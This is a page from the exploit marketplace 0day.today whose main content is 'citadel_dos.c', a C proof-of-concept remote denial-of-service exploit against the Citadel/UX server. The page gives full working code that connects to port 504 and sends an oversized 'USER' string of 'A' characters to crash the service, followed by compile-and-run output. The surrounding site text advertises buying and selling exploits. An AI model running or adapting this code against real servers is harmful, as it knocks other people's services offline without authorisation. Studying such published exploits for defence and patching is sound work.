0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Citadel/UX Remote Denial of Service Exploit (PoC)
================================================= Citadel/UX Remote Denial of Service Exploit (PoC) ================================================= /* citadel_dos.c * * Citadel/UX Remote DoS exploit (Proof of Concept) * * Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0 * * by CoKi <coki@nosystem.com.ar> * No System Group - http://www.nosystem.com.ar */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <getopt.h> #include <netdb.h> #include <sys/types.h> #include <sys/fcntl.h> #include <netinet/in.h> #include <sys/socket.h> #define BUFFERSIZE 96+1 #define ERROR -1 #define TIMEOUT 3 #define PORT 504 int connect_timeout(int sfd, struct sockaddr *serv_addr, socklen_t addrlen, int timeout); void use(char *program); int main(int argc, char *argv[]) { char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE]; int sockfd; struct hostent *he; struct sockaddr_in dest_dir; if(argc != 2) use(argv[0]); p = buffer; printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n"); printf(" by CoKi <coki@nosystem.com.ar>\n\n"); memset(p, 'A', 96); p += 92; *p = '\0'; printf(" [+] verifying host:\t"); fflush(stdout); if((he=gethostbyname(argv[1])) == NULL) { herror("Error"); printf("\n"); exit(1); } printf("OK\n"); if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) { perror("Error"); printf("\n"); exit(1); } dest_dir.sin_family = AF_INET; dest_dir.sin_port = htons(PORT); dest_dir.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(dest_dir.sin_zero), 8); printf(" [+] conecting...\t"); fflush(stdout); if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir, sizeof(struct sockaddr), TIMEOUT) == ERROR) { printf("Closed\n\n"); exit(1); } printf("OK\n"); printf(" [+] sending exploit...\t"); fflush(stdout); recv(sockfd, temp, sizeof(temp), 0); send(sockfd, "USER ", 5, 0); send(sockfd, buffer, strlen(buffer), 0); send(sockfd, "\n", 1, 0); close(sockfd); printf("OK\n\n"); } int connect_timeout(int sfd, struct sockaddr *serv_addr, socklen_t addrlen, int timeout) { int res, slen, flags; struct timeval tv; struct sockaddr_in addr; fd_set rdf, wrf; fcntl(sfd, F_SETFL, O_NONBLOCK); res = connect(sfd, serv_addr, addrlen); if (res >= 0) return res; FD_ZERO(&rdf); FD_ZERO(&wrf); FD_SET(sfd, &rdf); FD_SET(sfd, &wrf); bzero(&tv, sizeof(tv)); tv.tv_sec = timeout; if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0) return -1; if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) { slen = sizeof(addr); if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1) return -1; flags = fcntl(sfd, F_GETFL, NULL); fcntl(sfd, F_SETFL, flags & ~O_NONBLOCK); return 0; } return -1; } void use(char *program) { printf("Use: %s <host>\n", program); exit(1); } ---------------------------------- End Code: citadel_dos.c ---------------------------------- Compiling and running in the following manner: coki@servidor:~$ make citadel_dos coki@servidor:~$ ./citadel_dos localhost Citadel/UX Remote DoS exploit (Proof of Concept) by CoKi [+] verifying host: OK [+] conecting... OK [+] sending exploit... OK coki@servidor:~$ # 0day.today [2024-07-07] #